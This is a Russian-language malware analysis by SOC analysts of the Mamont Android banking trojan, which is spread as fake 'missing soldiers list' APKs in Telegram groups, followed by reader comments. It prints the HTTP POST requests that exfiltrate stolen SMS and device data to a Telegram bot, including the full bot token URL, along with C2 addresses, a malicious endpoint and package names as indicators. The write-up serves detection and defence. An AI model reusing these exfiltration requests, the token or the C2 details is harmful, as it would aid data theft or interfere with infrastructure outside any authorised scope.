Привет! Это Камиль Камалетдинов и Егор Григорьев, специалисты Angara SOC. Мы обнаружили и изучили вредоносное ПО, которое злоумышленники распространяют в тематических группах, посвященных поиску пропавших в зоне СВО.

По подсчетам экспертов Отдела защиты бренда Angara SOC, на 43% каналов, посвященных поиску пропавших в зоне СВО, распространяются APK-файлы, содержащие вредоносное ПО.

С начала 2025 года в мессенджереTelegram все чаще стали появляться тематические группы с названиями «Поиск пропавших на СВО», «Пропавшие без вести СВО», созданные для помощи родственникам и волонтерам. Этим воспользовались злоумышленники, которые быстро придумали новую схему обмана пользователей.

Мошенники создают каналы с похожими названиями. На первый взгляд, такие ресурсы выглядят как каналы для помощи в поиске пропавших людей или как обычные информационные сообщества. В группах публикуются новостные посты о ходе СВО и списки пропавших военнослужащих в виде фотографий, PDF-и Excel-файлов с фамилиями и данными пропавших.

Но спустя некоторое время в этих же группах начинают появляться APK-файлы с названиями: «Списки действующих бойцов», «Список СВО», «Список погибших», «Список пленных». Также в группах могут публиковаться ссылки для скачивания этих файлов. Данные файлы, как утверждают авторы, содержат «расширенные списки» или «приложение с интерактивным поиском пропавших людей». Как правило, данные сообщения сопровождаются отзывами о работоспособности данного «приложения».

Рис. 1. Публикация в тематической Telegram-группе
Рис. 1. Публикация в тематической Telegram-группе

В действительности эти файлы представляют собой вредоносное программное обеспечение, способное получить доступ к персональным данным, банковским приложениям и управлению устройством.

 Описание приложений

Специалисты Отдела реагирования и цифровой криминалистики Angara SOC обнаружили в таких APK-файлах банковский троян Mamont для ОС Android. Приложения в результате установки имеют следующий вид на устройстве:

Рис. 2. Внешний вид приложений
Рис. 2. Внешний вид приложений

Их цель — обмануть жертву и заставить ВПО работать скрытно под видом обычного приложения. При этом злоумышленники в качестве иконки приложения «Списки госпиталей.apk» выбрали изображение документа в формате PDF, чтобы обманом заставить запустить вредоносное приложение.

При установке приложений «Списки госпиталей.apk» и «Список пропавших на 1.07.2025.apk» они запрашивают разрешение на получение доступа к SMS и на работу в качестве основного сервиса для работы с SMS.

Рис. 3. Запрос разрешения на использование в качестве основного SMS-приложения с разрешением доступа к списку контактов, истории SMS и т.д.
Рис. 3. Запрос разрешения на использование в качестве основного SMS-приложения с разрешением доступа к списку контактов, истории SMS и т.д.

Помимо перечисленных выше запросов, при установке на устройство приложения запрашивают и другие разрешения (с высоким риском) для реализации заложенного вредоносного функционала.

Табл. 1. Запрашиваемые разрешения приложений

Наименование разрешения

Описание

android.permission.ACCESS_NETWORK_STATE

Позволяет приложению просматривать состояние сетевого соединения

android.permission.CALL_PHONE

Позволяет приложению набирать телефонные номера без вашего вмешательства

android.permission.POST_NOTIFICATIONS

Позволяет приложению отображать уведомления

android.permission.READ_CALL_LOG

Позволяет приложению считывать журнал вызовов пользователя

android.permission.READ_CONTACTS

Позволяет приложению считывать все контактные (адресные) данные, хранящиеся на телефоне

android.permission.READ_EXTERNAL_STORAGE

Позволяет приложению считывать данные из внешнего хранилища

android.permission.READ_PHONE_NUMBERS

Разрешает доступ к чтению телефонных номеров на устройстве

android.permission.READ_PHONE_STATE

Позволяет приложению получать доступ к функциям телефона на устройстве. Приложение с таким разрешением может определять номер телефона и серийный номер этого телефона, активен ли вызов, к какому номеру подключен вызов и т.д.

android.permission.READ_SMS

Позволяет приложению считывать SMS-сообщения, хранящиеся на телефоне или SIM-карте

android.permission.RECEIVE_BOOT_COMPLETED

Позволяет приложению запускаться самостоятельно, как только система завершит загрузку

android.permission.RECEIVE_SMS

Позволяет приложению получать и обрабатывать SMS-сообщения

android.permission.RECEIVE_WAP_PUSH

Позволяет приложению получать и обрабатывать WAP-сообщения

android.permission.RECORD_AUDIO

Позволяет приложению получить доступ к пути к аудиозаписям

android.permission.SEND_SMS

Позволяет приложению отправлять SMS-сообщения

android.permission.WRITE_EXTERNAL_STORAGE

Позволяет приложению выполнять запись во внешнее хранилище

 

В результате получения указанных разрешений ВПО семейства Mamont может:

·         собирать информацию об устройстве и отправлять ее на сервер злоумышленника;

·         осуществлять перехват и отправку SMS-сообщений с зараженного устройства;

·         совершать звонки;

·         получать информацию истории звонков, контакты, список приложений, установленных на устройстве, историю SMS-сообщений;

·         перехватывать Clipboard data — данные из буфера обмена;

·         получать доступ к пользовательским файлам.

При запуске приложений происходит перенаправление на страницы с возможностью «поиска пропавших в СВО». Например, приложение «Список пропавших на 1.07.2025.apk» перенаправляет на страницу svo-poisk[.]net, которая выглядит следующим образом:

Рис. 4. Отображение веб-страницы в результате запуска приложения «Список пропавших на 1.07.2025.apk»
Рис. 4. Отображение веб-страницы в результате запуска приложения «Список пропавших на 1.07.2025.apk»

Несмотря на то, что данные приложения при установке запрашивают схожие разрешения, их функционал имеет некоторые различия.

Рассмотрим детально принцип работы каждого из приложений.

 Принцип работы приложений «Список пропавших на 1.07.2025.apk» и «Списки госпиталей.apk»

Приложения «Список пропавших на 1.07.2025.apk» и «Списки госпиталей.apk» имеют одинаковый функционал. В ходе работы они с непродолжительным интервалом получают следующие команды от управляющего сервера:

Табл. 2. Команды, получаемые приложениями от управляющего сервера

Команда

Значение команды

get_sms_command

Получить SMS с устройства

receive_ping

Проверить доступность устройства

 

В результате выполнения данных команд вся полученная с устройства жертвы информация в зашифрованном виде (в формате GZIP или JSON) отправляется через Telegram-бот на сервер злоумышленников.

Табл. 3. Отправка данных с устройства методом POST в бот из приложения «Список пропавших на 1.07.2025.apk»

POST /bot7518915935:AAE0SMsrVAWT__W1AqMk6KNejtEdqIK60Ng/sendMessage HTTP/2.0
host: api.telegram.org
content-type: application/json; charset=utf-8
content-length: 222
accept-encoding: gzip
user-agent: okhttp/4.10.0

Табл. 4. Отправка данных с устройства методом POST в бот из приложения «Списки госпиталей.apk»

POST /bot7518915935:AAE0SMsrVAWT__W1AqMk6KNejtEdqIK60Ng/sendMessage HTTP/2.0
host: api.telegram.org
content-type: application/json; charset=utf-8
content-length: 214
accept-encoding: gzip
user-agent: okhttp/4.10.0

Принцип работы приложения «Списки действующих бойцов (1).apk»

Приложение «Списки действующих бойцов (1).apk» также относится к семейству ВПО Mamont, однако оно было собрано другой версией билдера или другим автором, вследствие чего имеет некоторые отличия.

Это приложение осуществляет проверку на наличие определенных приложений, установленных на зараженном устройстве.

Рис. 5. Проверка на наличие установленных приложений
Рис. 5. Проверка на наличие установленных приложений

Однако в остальном программа обладает схожим функционалам с ранее рассмотренными приложениями: оно может перехватывать SMS-сообщения и звонки, собирает информацию об устройстве. При этом в программу статично вшит адрес управляющего сервера и иных серверов, принадлежащих злоумышленникам, на которые отправляется полученная информация.

Рис. 6. Код, отвечающий за сбор SMS из памяти устройства и подготовку их к отправлению в заданном формате
Рис. 6. Код, отвечающий за сбор SMS из памяти устройства и подготовку их к отправлению в заданном формате

Таким образом, телефон фактически оказывается в руках мошенников. Используя полученную информацию, злоумышленники могут получить доступ к банковским приложениям и мессенджерам пользователя, осуществить покупку и т.д., в результате чего могут пострадать еще и родственники пользователя.

Списки индикаторов (IOC)

Табл. 5. Список индикаторов для приложения «Списки действующих бойцов (1).apk»

Описание

IOC

Наименование пакета приложения

dfx.qshzdnm.hzpqew

C2

185.100.157.190:8000

 Табл. 6. Список индикаторов для приложения «Списки госпиталей.apk»

Описание

IOC

Наименование пакета приложения

nQQFLcGlCo.nPVlRt.nbP1IyLrth

C2

172.67.136.118 , 104.21.38.164

C2

https://fenrirsteal.pro/megapi

Bot

https://api.telegram.org/bot7518915935:AAE0SMsrVAWT__W1AqMk6KNejtEdqIK60Ng/sendMessage

 Табл. 7. Список индикаторов для приложения «Список пропавших на 1.07.2025.apk»

Описание

IOC

Наименование пакета приложения

nybnnHW4uo.n4NQiOsHXt.nONjMSYth

C2

104.21.38.164:443, 172.67.136.118

C2

https://fenrirsteal.pro/megapi/

Bot

https://api.telegram.org/bot7518915935:AAE0SMsrVAWT__W1AqMk6KNejtEdqIK60Ng/sendMessage

 

Подводя итоги

Рекомендуем отключить автозагрузку файлов в Telegram и внимательно проверять формат файлов перед их скачиванием. Как правило, различного рода списки публикуют в форматах «.docx», «.xlsx» и «.pdf». Перед скачиванием файлов в данных форматах рекомендуем проверять их на специальных сервисах, например VirusTotal. Также рекомендуем использовать на своем мобильном устройстве антивирусные приложения.

Не стоит заниматься поиском пропавших людей в тематических Telegram-группах, так как здесь вы рискуете столкнуться с мошенниками. Для поиска пропавшего военнослужащего рекомендуем обращаться в официальные организации, например в Государственный фонд «Защитники Отечества».

Комментарии (7)


  1. shaman4d
    21.08.2025 18:43

    Я думал что это прикол такой, который в новостях пишут, а оказывается что реально кто-то качает АПК. И более того(!) потом соглашается с установкой из неизвестного источника и потом еще раз подтверждает это когда ему ось телефона говорит что это может быть опасно...


    1. Birek
      21.08.2025 18:43

      Отчаявшиеся жены и матери с ума сходят от безызвестности. Поэтому цепляются за любую возможность найти родного человека. Сам состою в одном из чатов.


    1. vindy
      21.08.2025 18:43

      ну, для меня более дико, что этим же людям норм отпустить своих близких на СВО. Если настолько плохо со здравым смыслом - то врядли многие в этой выборке думают про какие-то пермишены и цифровую гигиену. При всем сочувствии к их человеческому горю и так далее.


      1. AndyLem
        21.08.2025 18:43

        Надо просто больше донатить на ВСУ, тогда и сво не будет, и горя, и вредоносных списков.


        1. psynix
          21.08.2025 18:43

          А даже если и будет из тюрьмы не очень то и заметно


          1. psynix
            21.08.2025 18:43

            о великий молчаливый минусатор, тыб хоть как то свою позицию описал а то как то прямо неудобно... толи слишком толсто толи слишком тонко ...


          1. AndyLem
            21.08.2025 18:43

            Ну тут такой выбор. Либо рискнуть тюрьмой, либо продолжить воевать против мирного населения другой страны. Просто во втором случае не стоит обижаться, когда прилетает ответка. Даже в виде не совсем этичных с точки зрения мирного времени вариантов